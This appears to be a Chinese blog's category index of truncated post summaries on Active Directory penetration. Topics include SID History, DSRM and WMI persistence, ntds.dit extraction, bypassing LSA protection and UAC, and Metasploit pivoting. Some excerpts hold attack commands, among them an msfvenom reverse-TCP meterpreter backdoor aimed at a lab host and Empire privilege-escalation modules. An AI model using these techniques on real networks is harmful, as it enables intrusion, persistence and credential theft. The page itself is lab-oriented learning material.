随笔分类 - 域渗透
摘要:https://blog.csdn.net/qq_41631806/article/details/118251231
阅读全文
摘要:LDAP(Light Directory Access Protocal)是一个基于X.500标准的轻量级目录访问协议,LDAP是支持跨平台的Internet协议,只需要通过LDAP做简单的配置就可以与服务器做认证交互。可以大大降低开发的成本。 windows Active Diretcory就是一
阅读全文
摘要:本文包含从 Internet 的各个角落收集的 PowerShell 命令列表,这些命令在渗透测试或红色团队练习期间可能会有所帮助。 该列表包括各种开发后的单行在纯 PowerShell 不需要任何攻击 (= 可能标记为恶意) 第三方模块, 但也一堆方便的管理命令. 查找包含敏感信息的文件 在开发后
阅读全文
摘要:活动目录使用备忘单 包含 Windows 活动目录的常见枚举和攻击方法的备忘单。 工具 Powersploit PowerUpSQL Powermad Impacket Mimikatz Rubeus - >编译版本 BloodHound AD Module ASREPRoast 枚举 使用 Pow
阅读全文
摘要:一、简介 每个用户都有自己的SID,SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限,SID History是在域迁移过程中需要使用的一个属性。 如果A域中的域用户迁移到B域中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID Histo
阅读全文
摘要:一、简介 SSP(Security Support Provider)是windows操作系统安全机制的提供者。简单的说,SSP就是DLL文件,主要用于windows操作系统的身份认证功能,例如NTLM、Kerberos、Negotiate、Secure Channel(Schannel)、Dige
阅读全文
摘要:一、DSRM简介 1.DSRM(Diretcory Service Restore Mode,目录服务恢复模式)是windows域环境中域控制器的安全模式启动选项。域控制器的本地管理员账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM的用途是:允许管理员在域环境出现故障
阅读全文
摘要:WMI型后门只能由具有管理员权限的用户运行。WMI后门通常使用powershell编写的,可以直接从新的WMI属性中读取和执行后门代码,给代码加密。通过这种方式攻击者会在系统中安装一个持久性的后门,且不会在磁盘中留下任何文件。 WMI型后门主要有两个特征:无文件和无进程。其基本原理是:将代码加密存储
阅读全文
摘要:1.下载NTDSX http://www.ntdsxtract.com git clone https://github.com/csababarta/ntdsxtract 安装 python setup.py build && python setup.py install 将导出的ntds.di
阅读全文
摘要:一、简介 通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:\Windows\NTDS\ntds.dit文件。使用windows本地卷影拷贝服务,就可以获得该文件的副本。 在活动目录中,所有的数据都保存在ntds.dit中。ntds.dit是一个二进制文件,存储位置为域控制器的%System
阅读全文
摘要:Exchange是由微软推出的用于企业环境中部署的邮件服务器。Exchange在逻辑上分为三个层次:网络层(network layer)、目录层(directory layer)、消息层(messaging layer),服务器角色正是在消息层上的一个细分。Exchange Server 2010包
阅读全文
摘要:一、单机密码抓取的防范方法 微软为了防止用户密码在内存中以明文形式泄露,发不了补丁KB2871997,关闭了Wdigest功能。windows server 2012以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码。对于win server 2012以下版本,通过安装KB287199
阅读全文
摘要:1.初识域环境 什么是域 域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 域(
阅读全文
摘要:权限提升 Bypass UAC usemodule powershell/privesc/bypassuac 设置listener execute list查看 usemodule powershell/private/bypassuac_wscript (win7) 当运行完提权模块后,back返
阅读全文
摘要:简介: 微软在 2014 年 3 月 12 日添加了 LSA 保护策略,用来防止对进程 lsass.exe 的代码注入,这样一来就无法使用 mimikatz 对 lsass.exe 进行注入,相关操作也会失败。 微软官方文档:https://docs.microsoft.com/en-us/prev
阅读全文
摘要:实验环境: kali 主机:192.168.88.193 目标靶机:win2008 R2 192.168.88.130 kali 主机上执行生成一个后门 exe: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.193 LPO
阅读全文
摘要:MSF 下域内渗透实战 先获取域内机器session run get_local_subnets //获取本地网络子网掩码 route add 192.168.233.0 255.255.255.0 1 //添加路由表 run autoroute -s 192.168.2.0 -n 255.255.
阅读全文
摘要:Kerberos认证工作原理 https://www.cnblogs.com/huamingao/p/7267423.html 5.获取访问活动目录数据库文件的权限(ntds.dit) 前提条件是获取域控权限: 1.通过备份路径(备份服务器储存,媒体,网络共享) 2 在准备配置成域控的服务器上找 N
阅读全文